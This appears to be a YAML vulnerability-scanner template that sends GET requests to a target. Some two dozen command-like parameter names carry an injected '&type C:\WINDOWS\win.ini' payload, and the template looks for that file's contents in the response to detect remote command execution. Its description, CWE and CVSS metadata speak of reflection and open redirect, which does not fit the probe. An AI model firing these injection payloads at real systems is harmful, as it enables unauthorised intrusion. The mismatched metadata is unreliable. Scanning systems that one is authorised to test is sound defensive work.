http:
- matchers:
  - status:
    - 200
    type: status
  - type: word
    words:
    - '[mci extensions]'
    - ADD-CMD100GAURAVGAURAV
  matchers-condition: and
  method: GET
  path:
  - '{{BaseURL}}?system_cmd=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&system_command=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&system_shell=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&shell_exec=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&assert=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&assertion=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&assert_code=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&assert_eval=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&assert_php=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini'
  - '{{BaseURL}}?assert_template=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&eval_shell=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&exec_shell=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&shell_eval=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini'
id: 9rcepost-30
info:
  author: erickfernandox
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  description: 'Verifica parametros ocultos que refletem dentro do HTML da pagina

    '
  metadata:
    max-request: 2
  name: 9rcepost
  severity: medium
  tags: fuzzer, generic
